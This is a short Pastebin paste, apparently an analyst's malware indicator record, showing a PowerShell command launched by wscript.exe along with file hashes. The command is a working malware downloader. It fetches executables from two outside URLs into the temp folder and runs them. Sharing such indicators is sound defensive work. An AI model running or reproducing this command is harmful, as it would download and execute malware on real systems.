Advertisement
opexxx

f20d2285d2a1905b647176f8de9e99ce

Mar 28th, 2017
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.68 KB | None | 0 0
  1.  
  2. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
  3. Parentname: C:\WINDOWS\system32\wscript.exe
  4. Command Line: "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" Import-Module BitsTransfer;$shell = New-Object -ComObject wscript.shell;$random = new-object random;$urls = 'http://fatflat.tw/file/hit.njk,http://horestn.pl/file/pos.cvb'.split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$url = $url.tostring();Start-BitsTransfer -Source $url -Destination $path;$shell.run($path);break;}catch{write-host $_.exception.message;}}
  5. MD5: df4217ddb34a0b73dc7aac7829371c0c
  6. SHA1: eef755c714ee355b9f483ede8753cddcf0684cd1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement